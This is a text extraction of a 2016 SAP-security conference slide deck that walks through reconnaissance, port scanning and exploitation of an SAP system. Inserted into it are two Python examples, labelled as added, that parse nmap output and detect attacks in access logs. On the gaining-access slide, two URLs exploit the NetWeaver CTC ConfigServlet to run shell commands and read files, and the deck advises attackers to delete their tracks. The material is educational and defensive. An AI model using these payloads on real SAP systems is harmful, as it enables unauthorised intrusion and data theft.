SYTYCH#16 So You Think You Can Hack

So You Think You Can Hack | sitNL 2016


Page 1: So You Think You Can Hack | sitNL 2016

SYTYCH#16 So You Think You Can Hack

Page 2: So You Think You Can Hack | sitNL 2016

• Company specialised in securing SAP systems and infrastructures
• SAP Security consulting
• Regular presenters on SAP Security at security conferences
• Research: in the worldwide top 5 for found SAP Security vulnerabilities
• Developer of Protect4S - Security Analyser for SAP™
• SAP Development Partner
• Our mission is to raise the security of mission-critical SAP platforms with minimal impact on day-to-day business.

Joris van de Vis, Fred van de Langenberg, Robin Vleeschhouwer

ERP Security

Page 3: So You Think You Can Hack | sitNL 2016

Let’s do something unique

Page 4: So You Think You Can Hack | sitNL 2016

Collective hack = Grouphack ≠ Grouphug

What are we going to do…

Hack a SAP system collectively

Page 5: So You Think You Can Hack | sitNL 2016

But wait…

Isn’t that illegal?

Yes (in many cases) it is. Hence the disclaimer:

Hacking is illegal and very naughty. This presentation is not aiming to stimulate or approve hacking. This presentation is meant for academic and educational purposes only.

Find the Get-out-of-jail-free card here:

I herewith approve all participants of SitNL#16 to hack my SAP system on host XXX, only on November 26 2016.

Page 6: So You Think You Can Hack | sitNL 2016

<TIP>During this presentation QR codes will be shown to simplify calling long URLs.

You might want to consider installing an app on your mobile phone called a QR code scanner to prevent typing really long URLs.</TIP>

Handy…

Page 7: So You Think You Can Hack | sitNL 2016

Anatomy of a hack…

We will go through some common steps of a hack / penetration test.

Step 1 – Reconnaissance: gathering of data about the target.

Step 2 – Scanning / enumeration: scan the perimeter internally and externally for vulnerabilities.

Step 3 – Gain access: use the information gathered in the previous steps to gain access to the target.

Step 4 – Keep access / go further: to successfully perform an attack, access must be maintained over a certain period of time. Further penetration of the target might also be needed to reach the target's crown jewels.

Step 5 – Delete tracks: be cautious, don't get noticed or caught. Make sure to delete your tracks: logs, tooling, created users, etc.

Page 8: So You Think You Can Hack | sitNL 2016

Step 1: Reconnaissance

Step 1 - Reconnaissance

Try to gather as much information as possible on the business and the way of working of the target. Find information like how they operate, the types of systems in use, procedures, IP ranges, domain names, mail servers, DNS, etc.

Tooling: social media (Facebook, LinkedIn), Google, and for example Shodan and Censys.

http://whois.domaintools.com/erp-sec.com

https://www.shodan.io/search?query=sap+netweaver

Page 9: So You Think You Can Hack | sitNL 2016

Step 1: Reconnaissance

Page 10: So You Think You Can Hack | sitNL 2016

Step 2: Scanning

Step 2 – Scanning / enumeration: scan the environment internally and externally to get a clear picture of the target. Scanning is done to find open ports with, hopefully, vulnerable services behind them. Scanning is most often done at network level: think of port scans, scans for specific services, firewall scans, scans to detect the operating system version, etc.

Tooling: network scanners and other scanning tools like nmap and responder.py, network sniffing tools like Wireshark, keyloggers, etc. (really too many to name).
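A defender reads the same scan output the other way round: which SAP service ports are reachable from where the scan was run, and which instance they belong to. The following is an added example, not code from the presentation or from ERP Security; it parses nmap's grepable (`-oG`) output and maps open ports onto SAP's default port conventions (instance number NN: 32NN dispatcher, 33NN gateway, 36NN message server, 80NN ICM HTTP, 5NN00/5NN01 Java AS HTTP/HTTPS, 5NN04 P4, 5NN08 Java telnet, 5NN13/5NN14 sapstartsrv). The scan output, host and port list below are constructed for the example; the port-to-role mapping is a heuristic and a high port such as 8080 would match the ICM pattern as instance 80, so treat hits as leads to verify, not as facts.

```python
import re

# Constructed nmap -oG (grepable) output for a fictional lab host. The Ports field
# layout (port/state/proto/owner/service/rpc/version/) is nmap's grepable format;
# the host, ports and service guesses are made up for this example.
SAMPLE_GNMAP = """\
# Nmap 7.70 scan initiated Sat Nov 26 14:00:00 2016 as: nmap -sV -oG - 10.10.10.23
Host: 10.10.10.23 ()\tStatus: Up
Host: 10.10.10.23 ()\tPorts: 22/open/tcp//ssh///, 3200/open/tcp//unknown///, 3300/open/tcp//unknown///, 8000/open/tcp//http///, 50000/open/tcp//http///, 50013/open/tcp//http///\tIgnored State: closed (994)
# Nmap done at Sat Nov 26 14:00:30 2016 -- 1 IP address (1 host up) scanned
"""

# One port entry: port/state/proto/owner/service/...
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/")

# SAP default port families where instance number NN = port - base (00..99)
SAP_PORT_RANGES = (
    (3200, "ABAP dispatcher (SAP GUI / DIAG)"),
    (3300, "RFC gateway"),
    (3600, "message server"),
    (8000, "ICM HTTP"),
)
# Java AS and sapstartsrv ports follow the 5NNxx scheme
JAVA_SUFFIXES = {
    0: "Java AS HTTP", 1: "Java AS HTTPS", 4: "P4",
    8: "Java telnet administration", 13: "sapstartsrv HTTP", 14: "sapstartsrv HTTPS",
}


def classify_sap_port(port):
    """Return (instance_number, role) if the port fits an SAP default port
    pattern, else None. Heuristic only: other software may use these ports."""
    for base, role in SAP_PORT_RANGES:
        if base <= port < base + 100:
            return port - base, role
    if 50000 <= port <= 59999:
        nn, suffix = divmod(port - 50000, 100)
        if suffix in JAVA_SUFFIXES:
            return nn, JAVA_SUFFIXES[suffix]
    return None


def parse_gnmap(text):
    """Return (host, port, state, service) for every port entry in grepable output."""
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab-separated field (e.g. "Ignored State")
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, _proto, service in PORT_RE.findall(ports_field):
            results.append((host, int(port), state, service))
    return results


def find_exposed_sap_services(text):
    """List open ports that look like SAP services, with instance number and role."""
    exposed = []
    for host, port, state, service in parse_gnmap(text):
        if state != "open":
            continue
        hit = classify_sap_port(port)
        if hit:
            nn, role = hit
            exposed.append({"host": host, "port": port, "instance": f"{nn:02d}",
                            "role": role, "nmap_service": service})
    return exposed


if __name__ == "__main__":
    for entry in find_exposed_sap_services(SAMPLE_GNMAP):
        print(f"{entry['host']}:{entry['port']}  instance {entry['instance']}  {entry['role']}")
```

Run against a real `nmap -oG` file from inside and outside the network and compare the two lists: anything in the external list that is not a deliberately published service (typically only the reverse-proxied HTTPS front end) is a finding for the network and Basis teams.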

Page 11: So You Think You Can Hack | sitNL 2016

Step 2: Scanning

Step 2 – Scanning / enumeration

https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap

[Screenshot of the online port-scan result, with numbered callouts 1 to 4]

http://<XXXX>:50000/bestaatsinterklaasnuwelofniet?

Page 12: So You Think You Can Hack | sitNL 2016

Step 2: Scanning

Page 13: So You Think You Can Hack | sitNL 2016

Step 3: Gaining access

Step 3 – Gaining access

Try to gain access to one or more systems using the information gathered before. From there, extract valuable information or penetrate further into the landscape.

Tooling: create your own, or use exploitation tools to exploit vulnerabilities via SQL injection, XSS, CSRF, RCE, directory traversal, code injection, verb tampering, etc. Again, too many to name. Use social engineering to hack the human.

http://<XXXXXXXX>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls

http://XXXXXXXXXXXXXXX:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20supergeheimen.txt
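The two URLs above have a very recognisable shape: a request to the CTC ConfigServlet whose single `param` value carries `EXECUTE_CMD` and a `CMDLINE=`. That makes them easy to look for in HTTP access logs, which is the detection side of this step. The following is an added example, not code from the presentation or from ERP Security: it scans (constructed) combined-log-format lines, such as a reverse proxy in front of a NetWeaver Java AS would write, flags every request to the `/ctc/servlet/` path, decodes the `CMDLINE` value where present, and records whether the server answered 200 (request accepted) or blocked it. IPs, timestamps and the log layout are assumptions for the example; the servlet's `param` syntax is taken from the slide.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format). IPs and timestamps are fictional;
# the two ConfigServlet requests mirror the URL shape shown on the slide.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Nov/2016:14:02:11 +0100] "GET /irj/portal HTTP/1.1" 200 5120
203.0.113.7 - - [26/Nov/2016:14:02:40 +0100] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls HTTP/1.1" 200 812
203.0.113.7 - - [26/Nov/2016:14:03:05 +0100] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20supergeheimen.txt HTTP/1.1" 200 433
198.51.100.4 - - [26/Nov/2016:14:04:00 +0100] "GET /bestaatsinterklaasnuwelofniet? HTTP/1.1" 404 1298
198.51.100.4 - - [26/Nov/2016:14:05:19 +0100] "POST /ctc/servlet/com.sap.ctc.util.ConfigServlet HTTP/1.1" 401 0
"""

# Combined log format: ip ident user [timestamp] "METHOD target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

CTC_SERVLET_PREFIX = "/ctc/servlet/"


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_cmdline(target):
    """Return the decoded CMDLINE value of an EXECUTE_CMD request, or None.
    The servlet packs its arguments into one 'param' query value separated by
    ';', so the value is split by hand rather than with a generic query parser
    (older urllib.parse.parse_qs versions also split on ';' and would mangle it)."""
    if "?" not in target:
        return None
    query = target.split("?", 1)[1]
    for pair in query.split("&"):
        if not pair.startswith("param="):
            continue
        fields = unquote(pair[len("param="):]).split(";")
        if "EXECUTE_CMD" not in fields:
            continue
        for i, field in enumerate(fields):
            if field.startswith("CMDLINE="):
                # re-join so a command that itself contains ';' is kept whole
                return ";".join(fields[i:])[len("CMDLINE="):]
    return None


def scan_log(text):
    """Flag every request to the CTC servlet path and decode any command it carried."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["target"].split("?", 1)[0]
        if not path.startswith(CTC_SERVLET_PREFIX):
            continue
        cmd = extract_cmdline(rec["target"])
        findings.append({
            "ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
            "status": int(rec["status"]), "path": path, "cmdline": cmd,
            # 200 on an EXECUTE_CMD request means the server accepted it;
            # 401/403/404 means it was blocked or the servlet is not deployed
            "executed": cmd is not None and rec["status"] == "200",
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "EXECUTED" if f["executed"] else "blocked/no command"
        print(f"{f['ts']} {f['ip']} {f['method']} {f['path']} -> {f['status']} [{flag}] {f['cmdline']!r}")
```

Any hit with `executed` true on a production system is an incident, not a finding to schedule. Hits that were blocked still tell you someone is probing for this servlet, and a system that answers 200 to `/ctc/servlet/` at all should have its Java AS patch level and deployed applications reviewed by the Basis team.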

Page 14: So You Think You Can Hack | sitNL 2016

Step 3: Gaining access

Page 15: So You Think You Can Hack | sitNL 2016

Towards solutions

- There is no silver bullet solution
- SAP (platform) security goes beyond team boundaries. Involve:
  - SAP Basis team
  - SAP Authorisations team
  - Database team
  - Operating system team
  - Network team
- Involve management; this is not a purely technical matter
- Create a security process instead of a one-time project
- You might consider using tooling to support this process.

Page 16: So You Think You Can Hack | sitNL 2016

Demo Protect4S

Page 17: So You Think You Can Hack | sitNL 2016

Questions?

For more information please visit https://www.erp-sec.com

Page 18: So You Think You Can Hack | sitNL 2016

SAP, R/3, ABAP, SAP GUI, SAP NetWeaver and other SAP products and services mentioned herein as well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and other countries.

All other product and service names mentioned are the trademarks of their respective companies. Data contained in this document serves informational purposes only.

The authors assume no responsibility for errors or omissions in this document. The authors do not warrant the accuracy or completeness of the information, text, graphics, links, or other items contained within this material. This document is provided without a warranty of any kind, either express or implied, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The authors shall have no liability for damages of any kind including without limitation direct, special, indirect, or consequential damages that may result from the use of this document.

SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials.

No part of this document may be reproduced without the prior written permission of ERP Security BV. © 2013 ERP Security BV.

Disclaimer

Page 19: So You Think You Can Hack | sitNL 2016